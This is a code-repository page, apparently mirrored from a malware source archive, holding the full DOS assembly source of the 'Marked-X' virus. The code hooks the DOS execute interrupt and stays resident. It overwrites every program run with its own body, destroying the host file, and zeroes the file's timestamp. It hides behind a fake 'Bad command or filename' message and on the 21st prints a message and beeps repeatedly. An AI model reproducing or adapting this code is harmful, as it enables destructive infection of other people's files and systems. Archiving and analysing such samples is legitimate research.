mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
103 lines
4.1 KiB
NASM
103 lines
4.1 KiB
NASM
|
; Name: Marked-X
|
||
|
; Author: Metal Militia/Immortal Riot
|
||
|
; Resident: Yes
|
||
|
; Encryption: No
|
||
|
virus segment
|
||
|
assume cs:virus, ds:virus
|
||
|
org 100h
|
||
|
start:
|
||
|
mov ah,2ah ; Function 2Ah: Get System Date
|
||
|
int 21h ; Retrieve date
|
||
|
cmp dl,21 ; DL = Date ( tests against 21st )
|
||
|
je Payload ; Its time for the payload, 21st of month
|
||
|
mov ah,9h ; Function 09h: Print String
|
||
|
mov dx,offset note ; Location of decoy note
|
||
|
int 21h ; Explains why the file will not run.
|
||
|
jmp Go_TSR ; Time to go TSR
|
||
|
Payload:
|
||
|
; The test at the beginning proves it to be the 21st, now to
|
||
|
; drop a bomb on victim.
|
||
|
; Prints the payload message to announce wtf is going on.
|
||
|
mov ah,9h ; Function 09h: Print String to Standard output
|
||
|
mov dx,offset society ; Its the message
|
||
|
int 21h ; Tells DOS to announce our presence
|
||
|
mov cx,1000 ; Print 1000 times
|
||
|
mov ax,0E07h ; Function 0Eh: Teletype output
|
||
|
; 07h = The bell character, makes a beep!
|
||
|
beeper:
|
||
|
int 10h ; Video functions
|
||
|
loop beeper ; Beeps 1000h times, The count in CX
|
||
|
Go_TSR:
|
||
|
jmp tsrdata ; Celebrate! now put us as a TSR in memory
|
||
|
new21:
|
||
|
pushf ; Pushes the Flags Register
|
||
|
cmp ah,4bh ; Function 4Bh: Execute program
|
||
|
jz infect ; If a file is being run, infect it.
|
||
|
jmp short end21 ; If a file is not being run then we
|
||
|
; must head back to the old INT 21h.
|
||
|
infect:
|
||
|
mov ax,4301h ; Function 4301h: Set Attributes
|
||
|
and cl,0feh ; Keeps all File attributes 'cept read-only
|
||
|
int 21h ; Makes the file writeable
|
||
|
mov ax,3d02h ; Function 3D02h: Open File for Read/Write access
|
||
|
int 21h
|
||
|
mov bx,ax ; Puts file handle in BX
|
||
|
push ax ; Push all
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ax,4200h ; Move to beginning of victim file
|
||
|
xor cx,cx
|
||
|
cwd
|
||
|
int 21h
|
||
|
mov cx,offset endvir-100h ; Length of area to write
|
||
|
mov ah,40h ; Function 40h: Write to file
|
||
|
mov dx,100h ; Start of Virus
|
||
|
int 21h
|
||
|
cwd ; Set Date/Time
|
||
|
xor cx,cx ; to zero (00-00-00)
|
||
|
mov ax,5701h
|
||
|
int 21h
|
||
|
mov ah,3eh ; Close Victim file
|
||
|
int 21h
|
||
|
x21:
|
||
|
pop ds ; pop all ; Restores all registers
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
end21:
|
||
|
popf ; Pops the flags register to keep it unaltered
|
||
|
db 0eah ; Jumps Far to the old Int 21h handler
|
||
|
old21 dw 0,0 ; Where to store the old INT21
|
||
|
data_1 db 'Marked-X' ; Virus name
|
||
|
db 'Will we ever learn to talk with eachother?' ; Virus poem
|
||
|
db '(c) Metal Militia/Immortal Riot' ; Virus author
|
||
|
society db 'In any country, prison is where society sends it''s',0dh,0ah
|
||
|
db 'failures, but in this country society itself is faily',0dh,0ah
|
||
|
db '$' ; Information note
|
||
|
note db 'Bad command or filename',0dh,0ah
|
||
|
db '$' ; Fake note
|
||
|
tsrdata:
|
||
|
mov ax,3521h ; Function 35??h: Get Interrupt Vector
|
||
|
; AL = INT#
|
||
|
; Returns ES:BX of old Interrupt vector
|
||
|
int 21h ; Find out where INT 21h goes
|
||
|
mov cs:[old21],bx ; Places the Old INT 21h vector into
|
||
|
mov cs:[old21+2],es ; its proper place.
|
||
|
mov dx,offset new21 ; Insertion Point of New INT 21h
|
||
|
mov ax,2521h ; Function 25??h: Set new Int Vector
|
||
|
; AL = INT #
|
||
|
; Makes DS:DX new INT Vector
|
||
|
int 21h ; Coolness
|
||
|
push cs ; CS = Code segment that the PSP of TSR
|
||
|
; progge is located in.
|
||
|
pop ds ; Copy that into DS
|
||
|
mov dx,offset endvir ; Put all of us in memory
|
||
|
int 27h ; Do it, TSR (terminate & stay resident)
|
||
|
endvir label byte ; End of file
|
||
|
virus ends
|
||
|
end start
|